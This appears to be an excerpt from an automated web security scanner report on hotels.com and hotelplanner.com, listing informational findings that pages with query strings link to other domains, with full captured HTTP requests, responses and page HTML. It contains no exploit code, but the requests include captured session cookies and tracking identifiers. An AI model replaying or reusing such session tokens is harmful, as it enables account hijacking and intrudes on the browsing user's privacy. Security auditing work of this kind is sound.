<a href="/Hotel/HotelRoomTypes.cfm?hotelID=216642&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/010000/010348A-thumb.jpg" width="64" height="64" border="1" alt="Onyx Hotel, a Kimpton Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=116085&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/013000/013360A-thumb.jpg" width="64" height="64" border="1" alt="Hyatt Regency Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=277552&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/103000/103982A-thumb.jpg" width="64" height="64" border="1" alt="Fairmont Battery Wharf Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=324884&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/114000/114273A-thumb.jpg" width="64" height="64" border="1" alt="W Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=115103&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/012000/012062A-thumb.jpg" width="64" height="64" border="1" alt="Four Seasons Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=255157&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/025000/025299A-thumb.jpg" width="64" height="64" border="1" alt="The Liberty Hotel - A Starwood Luxury Collection Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=109107&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/004000/004470A-thumb.jpg" width="64" height="64" border="1" alt="Radisson Boston Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=122147&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/021000/021745A-thumb.jpg" width="64" height="64" border="1" alt="The Boston Park Plaza Hotel &amp; Towers" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=152759&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/012000/012018A-thumb.jpg" width="64" height="64" border="1" alt="Royal Sonesta Hotel Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=207768&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/046000/046065A-thumb.jpg" width="64" height="64" border="1" alt="Hotel Marlowe, a Kimpton Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=242136&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/070000/070926A-thumb.jpg" width="64" height="64" border="1" alt="The Westin Boston Waterfront" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=105311&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/000000/MM000013-thumb.jpg" width="64" height="64" border="1" alt="The Westin Copley Place" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=114172&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/010000/010677A-thumb.jpg" width="64" height="64" border="1" alt="Copley Square Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=106307&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/001000/001228A-thumb.jpg" width="64" height="64" border="1" alt="Marriott Boston Copley Place" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=219844&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/012000/012989A-thumb.jpg" width="64" height="64" border="1" alt="Marriott Cambridge" hspace="2" vspace="2"></a>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<td align="center" WIDTH="135" rowspan="2">
               
                   <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&amp;layout=button_count&amp;show_faces=false&amp;width=46&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:46px; height:21px;" allowTransparency="true"></iframe> <a href="http://www.facebook.com/hotelplanner?v=app_6009294086" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/FacebookSmall.gif" hspace="2" alt="" border="0"></a>
                   <a href="http://twitter.com/hotelplanner" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/TwitterSmall.gif" alt="" border="0"></a>
                   <a href="http://www.youtube.com/user/HotelPlanner30" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/YouTubeSmall.gif" alt="" border="0">
...[SNIP]...
<br>
                   <a href="http://itunes.apple.com/us/app/hotel-planner-hotel-deals/id420759661?mt=8" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/Iphone-HotelPlanner.gif" alt="Hotel Planner iPhone App" style="margin-top:6px;" border="0"></a><a href="https://market.android.com/details?id=com.hotelplanner.activity" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/Android-HotelPlanner.gif" alt="Hotel Planner Android App" style="margin-top:6px;" border="0">
...[SNIP]...
19.198. https://www.hotelplanner.com/Accept/Reserve.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<td valign="top" colspan="2" align="center">
   <script src=https://seal.verisign.com/getseal?host_name=WWW.HOTELPLANNER.COM&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
19.199. http://www.hotels.com/hotel/details.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<div class="tweet">
<a href="http://twitter.com/share" class="twitter-share-button">Tweet</a>
...[SNIP]...
<li class="delicious">
<a class="hcomPopup" href="http://del.icio.us/post?url=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Del.icio.us" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="google">
<a class="hcomPopup" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Google" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="squidoo">
<a class="hcomPopup" href="http://www.squidoo.com/lensmaster/bookmark?www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Squidoo" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="reddit">
<a class="hcomPopup" href="http://reddit.com/submit?url=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Reddit" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="myspace">
<a class="hcomPopup" href="http://www.myspace.com/Modules/PostTo/Pages/?u=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="MySpace" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="facebook">
<a class="hcomPopup" href="http://www.facebook.com/sharer.php?u=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Facebook" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="digg">
<a class="hcomPopup" href="http://digg.com/submit?phase=2&url=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Digg" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="stumbleupon">
<a class="hcomPopup" href="http://www.stumbleupon.com/submit?url=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="StumbleUpon" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<li class="yahoo">
<a class="hcomPopup" href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=www.hotels.com%2Fho109368%2Fboston-omni-parker-house-hotel-boston-united-states%2F" title="Yahoo" rel="nofollow" target="_blank" >
<span class="icon">
...[SNIP]...
<div class="rd_hd-thumbnail_map_image">
<img src="http://maps.google.com/maps/api/staticmap?center=42.35777,-71.05963&zoom=15&size=300x215&sensor=false&markers=icon:http%3A%2F%2Fwww.hotels.com%2Fimages%2Fstatic%2Fmap%2Fmap_pin_hotel_active_us.png%7C42.35777,-71.05963&client=gme-expedia&signature=N0P97oo2bRTQeZ1y0AVam8ESX6k=" alt="Boston Omni Parker House Hotel" />
</div>
...[SNIP]...
<div class="static_map_container">
<img class="js_hidden" src="http://maps.google.com/maps/api/staticmap?center=42.35777,-71.05963&zoom=16&size=834x443&sensor=false&markers=icon:http%3A%2F%2Fwww.hotels.com%2Fimages%2Fstatic%2Fmap%2Fmap_pin_hotel_active_us.png%7C42.35777,-71.05963&client=gme-expedia&signature=WQl3hmQ9XXpkOtrcmzX577lr-Ww=" alt="" height="443" width="834" />
</div>
...[SNIP]...
<div class="opinionlab_bottom clearfix">
<a href="https://secure.opinionlab.com/ccc01/o.asp?id=YIbVvQSw&propertyid=109368&pos=HCOM_US&custom_var=e206d102-4853-4dd2-9d9b-23d14562d0f1&referer=http%3A%2F%2Fen_US.www.hotels.com%2Fhotel%2Fdetails.html" class="hcomPopup">
<span>
...[SNIP]...
<li><a href="http://www.hoteles.com" title="Espa..ol" lang="es" hreflang="es">Espa..ol</a>
...[SNIP]...
<li><a href="http://www.hoteis.com" title="Portugu..s" lang="pt" hreflang="pt">Portugu..s</a>
...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<br />
<a href="http://www.verisign.com/ssl-certificate/" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT SSL CERTIFICATES</a>
...[SNIP]...
<li>
<a href="https://joinexpedia.com/default.asp?lang=uk" rel="nofollow">
Add Hotel</a>
...[SNIP]...
<li>
<a href="http://www.expediaaffiliate.com/" rel="nofollow">
Private Label</a>
...[SNIP]...
<li>
<a href="http://www.advertising.expedia.com" rel="nofollow">
Promote with Us</a>
...[SNIP]...
<li>
<a href="http://www.agentrez.com/" rel="nofollow">
Travel Agents</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
<iframe src="http://fls.doubleclick.net/activityi;src=3057879;type=prope724;cat=prope480;u1=US;u2=Boston;u3=Boston Omni Parker House Hotel;u4=Merchant;u5=109368;u6=289.00;u11=4;u15=1401516;u16=04%2F10%2F11-07%2F10%2F11;ord=42823804?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
19.200. http://www.hotels.com/hotel/hoteldata.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=103.4.1.i6%3A132.2.0.i2%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTAzLjQuMS5pNjoxMzIuMi4wLmkyfEhDT01fVVMhRSoxMDkzNjh8MDQvMTAvMjAxMXwwNy8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:57 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h
...[SNIP]...
</span>
<a href="http://hcom.tripadvisor.com/Hotel_Review-g60745-d89599-Reviews-m11419-Omni_Parker_House-Boston_Massachusetts.html" rel="nofollow" target="_blank">
See all <em>
...[SNIP]...
19.201. http://www.hotels.com/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
